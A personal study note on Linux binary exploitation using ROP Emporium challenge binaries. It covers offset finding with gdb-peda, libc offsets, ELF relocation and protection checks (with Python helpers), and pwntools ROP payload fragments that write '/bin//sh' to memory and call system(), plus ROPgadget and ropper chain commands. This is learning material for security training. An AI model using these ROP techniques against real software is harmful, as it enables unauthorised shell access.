This article is a summary of the past two weeks spent trying to learn Linux binary exploitation, written as a personal note that may be useful later on. As in the previous article, I am only trying out what others have written, in order to understand Linux binary exploitation bit by bit. The references used during this study are listed below:
https://github.com/nnamon/linux-exploitation-course
https://ropemporium.com/guide.html
https://github.com/abatchy17/ROP-Emporium
Linux Binary Protection
https://github.com/nnamon/linux-exploitation-course/blob/master/lessons/5_protections/lessonplan.md
```
# gdb ./write432
gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ pattern offset 0x41414641
1094796865 found at offset: 44
gdb-peda$
```
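The two peda commands above generate a non-repeating pattern and then look up where the value left in a register (here 0x41414641, which is the bytes "AFAA" in little-endian order) sits in it, which gives the distance from the start of the buffer to the saved return address. As an added example that is not part of the original notes or of peda, the following Python reimplements both steps with the standard library only: cyclic() builds a de Bruijn pattern like pwntools' cyclic(), find_offset() searches any pattern (including the peda pattern from the session above, embedded as PEDA_PATTERN), and cyclic_find() recovers the offset from a de Bruijn pattern without needing the exact bytes that were sent. The function names are my own.

```python
import itertools

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"

# The 200-byte pattern printed by `pattern create 200` in the gdb-peda session above.
PEDA_PATTERN = (b"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4"
                b"AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAAT"
                b"AAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")


def _de_bruijn(alphabet=ALPHABET, n=4):
    """Yield the de Bruijn sequence B(k, n) byte by byte (the FKM algorithm).
    Every n-byte window in the first k**n bytes is unique, which is what makes
    an offset recoverable from a single register value."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, alphabet=ALPHABET, n=4):
    """Equivalent of `pattern create <length>`: the first `length` bytes of the
    de Bruijn sequence."""
    return bytes(itertools.islice(_de_bruijn(alphabet, n), length))


def find_offset(pattern, value, width=4):
    """Equivalent of `pattern offset <value>`: locate the little-endian encoding
    of `value` (an int such as a crashing EIP/RIP, or raw bytes) in `pattern`.
    Returns the first index, or -1 if the value does not occur."""
    needle = value.to_bytes(width, "little") if isinstance(value, int) else value
    return pattern.find(needle)


def cyclic_find(value, alphabet=ALPHABET, n=4):
    """Offset of `value` in the full de Bruijn pattern for this alphabet and n,
    so the pattern that was actually sent does not have to be kept around."""
    full = cyclic(len(alphabet) ** n, alphabet, n)
    return find_offset(full, value, n)


if __name__ == "__main__":
    print("peda pattern, 0x41414641 ->", find_offset(PEDA_PATTERN, 0x41414641))  # 44
    print("cyclic(200) ->", cyclic(200))
    print("cyclic_find(0x61616163) ->", cyclic_find(0x61616163))                 # 8
```

A lookup is only meaningful if the value occurs once in the pattern; the de Bruijn construction guarantees that for every n-byte window inside the first 26**n bytes, so a 4-byte window covers 456976 bytes of distinct offsets, far more than the 200 used here.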
```
$ ldd callme
	linux-vdso.so.1 (0x00007fff306bd000)
	libcallme.so => ./libcallme.so (0x00007fd3c2179000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd3c1fa1000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fd3c237d000)
```
https://github.com/niklasb/libc-database
```
$ ./add /lib/i386-linux-gnu/libc.so.6
$ ./dump local-0490256d1290b4c4fb59f37f9d3d87226d6500e6
offset___libc_start_main_ret = 0x199a1
offset_system = 0x0003d870
offset_dup2 = 0x000e6f60
offset_read = 0x000e6470
offset_write = 0x000e6540
offset_str_bin_sh = 0x17c968
```
```
# r2 -d write432
[0xf7f7d250]> aaa
[0xf7f7d250]> afl
0x080483c0    3 35           sym._init
0x08048400    1 6            sym.imp.printf
0x08048410    1 6            sym.imp.fgets
0x08048420    1 6            sym.imp.puts
0x08048430    1 6            sym.imp.system
0x08048440    1 6            sym.imp.__libc_start_main
0x08048450    1 6            sym.imp.setvbuf
0x08048460    1 6            sym.imp.memset
0x08048470    1 6            sub.__gmon_start_470
0x08048480    1 33           entry0
0x080484b0    1 4            sym.__x86.get_pc_thunk.bx
0x080484c0    4 43           sym.deregister_tm_clones
0x080484f0    4 53           sym.register_tm_clones
0x08048530    3 30           sym.__do_global_dtors_aux
0x08048550    4 43   -> 40   entry1.init
0x0804857b    1 123          sym.main
0x080485f6    1 86           sym.pwnme
0x0804864c    1 25           sym.usefulFunction
0x08048680    4 93           sym.__libc_csu_init
0x080486e0    1 2            sym.__libc_csu_fini
0x080486e4    1 20           sym._fini
```
The PLT stub for system() at 0x08048430 jumps through its GOT slot at 0x804a018 (the same address that .rel.plt below lists as the R_386_JUMP_SLOT for system):
```
# objdump -d write432 -j .plt
08048430:
 8048430:	ff 25 18 a0 04 08    	jmp    *0x804a018
 8048436:	68 18 00 00 00       	push   $0x18
 804843b:	e9 b0 ff ff ff       	jmp    80483f0 <.plt>
```
```
# readelf --relocs write432

Relocation section '.rel.dyn' at offset 0x368 contains 4 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000506 R_386_GLOB_DAT    00000000   __gmon_start__
0804a040  00000a05 R_386_COPY        0804a040   stderr@GLIBC_2.0
0804a060  00000c05 R_386_COPY        0804a060   stdin@GLIBC_2.0
0804a064  00000905 R_386_COPY        0804a064   stdout@GLIBC_2.0

Relocation section '.rel.plt' at offset 0x388 contains 7 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf@GLIBC_2.0
0804a010  00000207 R_386_JUMP_SLOT   00000000   fgets@GLIBC_2.0
0804a014  00000307 R_386_JUMP_SLOT   00000000   puts@GLIBC_2.0
0804a018  00000407 R_386_JUMP_SLOT   00000000   system@GLIBC_2.0
0804a01c  00000607 R_386_JUMP_SLOT   00000000   __libc_start_main@GLIBC_2.0
0804a020  00000707 R_386_JUMP_SLOT   00000000   setvbuf@GLIBC_2.0
0804a024  00000807 R_386_JUMP_SLOT   00000000   memset@GLIBC_2.0
```
```
# rabin2 -S write432
23 0x00000ffc    4 0x08049ffc    4 -rw- .got
24 0x00001000   40 0x0804a000   40 -rw- .got.plt
25 0x00001028    8 0x0804a028    8 -rw- .data
26 0x00001030    0 0x0804a040   44 -rw- .bss
```
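The section listing above shows .got and .got.plt as writable in the file, but whether they stay writable at run time is decided by RELRO, which is recorded in the program headers (PT_GNU_RELRO) and the dynamic section (BIND_NOW), not in the section flags; the same applies to NX (PT_GNU_STACK) and PIE (ET_DYN) from the Linux Binary Protection lesson. As an added example, which is my own code and not part of the lesson or of the ROP Emporium binaries, the following stdlib-only Python reads those headers the way checksec does, for both ELF32 and ELF64. The images it checks are constructed inside the script by build_elf(), not read from write432; to check a real binary, call check_protections(open(path, "rb").read()).

```python
import struct

# ELF constants (System V ABI plus the GNU program-header extensions)
ELFCLASS32, ELFCLASS64 = 1, 2
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def _layout(elf_class):
    """struct formats for the ELF header, one program header and one dynamic
    entry, plus the program-header field order (ELF64 moved p_flags next to p_type)."""
    if elf_class == ELFCLASS32:
        return ("<16sHHIIIIIHHHHHH", "<IIIIIIII", "<iI",
                ("type", "offset", "vaddr", "paddr", "filesz", "memsz", "flags", "align"))
    return ("<16sHHIQQQIHHHHHH", "<IIQQQQQQ", "<qQ",
            ("type", "flags", "offset", "vaddr", "paddr", "filesz", "memsz", "align"))


def _bind_now(data, off, size, dyn_fmt):
    """True if the dynamic section asks the loader to resolve all symbols at
    start-up (DT_BIND_NOW / DF_BIND_NOW / DF_1_NOW), the precondition for the
    GOT being remapped read-only (full RELRO)."""
    step = struct.calcsize(dyn_fmt)
    for pos in range(off, off + size, step):
        tag, val = struct.unpack_from(dyn_fmt, data, pos)
        if tag == DT_NULL:
            break
        if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) \
                or (tag == DT_FLAGS_1 and val & DF_1_NOW):
            return True
    return False


def check_protections(data):
    """Report NX / RELRO / PIE for an ELF image given as bytes."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ehdr_fmt, phdr_fmt, dyn_fmt, fields = _layout(data[4])
    hdr = struct.unpack_from(ehdr_fmt, data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    phdrs = [dict(zip(fields, struct.unpack_from(phdr_fmt, data, e_phoff + i * e_phentsize)))
             for i in range(e_phnum)]

    result = {"nx": False, "relro": "none", "pie": e_type == ET_DYN}
    for ph in phdrs:
        if ph["type"] == PT_GNU_STACK:
            # A missing PT_GNU_STACK means an executable stack, so NX is only
            # reported when the header exists and lacks PF_X.
            result["nx"] = not ph["flags"] & PF_X
        elif ph["type"] == PT_GNU_RELRO:
            result["relro"] = "partial"
    if result["relro"] == "partial":
        for ph in phdrs:
            if ph["type"] == PT_DYNAMIC and _bind_now(data, ph["offset"], ph["filesz"], dyn_fmt):
                result["relro"] = "full"
    return result


def build_elf(elf_class, e_type, segments, dynamic=()):
    """Construct a header-only ELF image for testing (constructed data, not a
    real binary). `segments` is a list of (p_type, p_flags, size); `dynamic`
    is a list of (d_tag, d_val) that, if non-empty, becomes a PT_DYNAMIC
    segment stored right after the program headers."""
    ehdr_fmt, phdr_fmt, dyn_fmt, fields = _layout(elf_class)
    ehsize, phentsize = struct.calcsize(ehdr_fmt), struct.calcsize(phdr_fmt)
    dyn_blob = (b"".join(struct.pack(dyn_fmt, t, v) for t, v in list(dynamic) + [(DT_NULL, 0)])
                if dynamic else b"")
    segs = list(segments) + ([(PT_DYNAMIC, PF_R | PF_W, len(dyn_blob))] if dyn_blob else [])
    body_off = ehsize + phentsize * len(segs)
    ident = b"\x7fELF" + bytes([elf_class, 1, 1, 0]) + b"\x00" * 8
    machine = 0x3E if elf_class == ELFCLASS64 else 0x03          # x86-64 / i386
    ehdr = struct.pack(ehdr_fmt, ident, e_type, machine, 1, 0, ehsize, 0, 0,
                       ehsize, phentsize, len(segs), 0, 0, 0)
    phdrs = b""
    for p_type, p_flags, size in segs:
        f = {"type": p_type, "flags": p_flags, "offset": body_off, "vaddr": 0,
             "paddr": 0, "filesz": size, "memsz": size, "align": 0}
        phdrs += struct.pack(phdr_fmt, *(f[name] for name in fields))
    return ehdr + phdrs + dyn_blob


if __name__ == "__main__":
    hardened = build_elf(ELFCLASS64, ET_DYN,
                         [(PT_GNU_STACK, PF_R | PF_W, 0), (PT_GNU_RELRO, PF_R, 0x1000)],
                         dynamic=[(DT_FLAGS_1, DF_1_NOW)])
    legacy = build_elf(ELFCLASS32, ET_EXEC, [(PT_GNU_STACK, PF_R | PF_W | PF_X, 0)])
    for name, img in (("hardened", hardened), ("legacy", legacy)):
        print(name, check_protections(img))
```

A binary that reports relro "none" or "partial" keeps .got.plt writable for its whole lifetime, which is exactly the property the write432 relocation listing relies on; "full" RELRO removes it at the cost of resolving every import at start-up.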
32-bit (write432): store the 4 bytes "/bin" into the data segment, passing them through ebp
```python
from pwn import p32

# gadget names as used in these notes: pop_edi_ebp = pop edi; pop ebp; ret
#                                      mov_edi_ebp = mov dword ptr [edi], ebp; ret
payload += p32(pop_edi_ebp)   # pop edi; pop ebp; ret
payload += p32(data_segment)  # edi <- writable address (.data / .bss)
payload += b'/bin'            # ebp <- the 4 bytes to write
payload += p32(mov_edi_ebp)   # mov dword ptr [edi], ebp; ret
```
64-bit: store the 8 bytes "/bin//sh" in one write (the doubled slash fills the qword, so no NUL byte has to be written)
```python
from pwn import p64

# gadget names as used in these notes: pop_r14_r15 = pop r14; pop r15; ret
#                                      mov_r14_r15 = mov qword ptr [r14], r15; ret
payload += p64(pop_r14_r15)   # pop r14; pop r15; ret
payload += p64(data_segment)  # r14 <- writable address
payload += b'/bin//sh'        # r15 <- the 8 bytes to write
payload += p64(mov_r14_r15)   # mov qword ptr [r14], r15; ret
```
32-bit system() ROP: on i386 the argument is taken from the stack, after the return address
```python
from pwn import p32

payload += p32(system_plt)    # call system via its PLT entry
payload += p32(0xdeadbeef)    # fake return address for system()
payload += p32(data_segment)  # first argument: pointer to the string written above
```
64-bit system() ROP: on x86-64 the first argument goes in rdi, so a `pop rdi; ret` gadget loads it first
```python
from pwn import p64

payload += p64(pop_rdi)       # pop rdi; ret
payload += p64(data_segment)  # rdi <- pointer to the string written above
payload += p64(system_plt)    # call system via its PLT entry
```
ROPgadget / ropper
```
$ ROPgadget --binary 1_staticnx --ropchain
$ ropper --file ../Downloads/1_staticnx --chain execve --badbytes 000a0d
```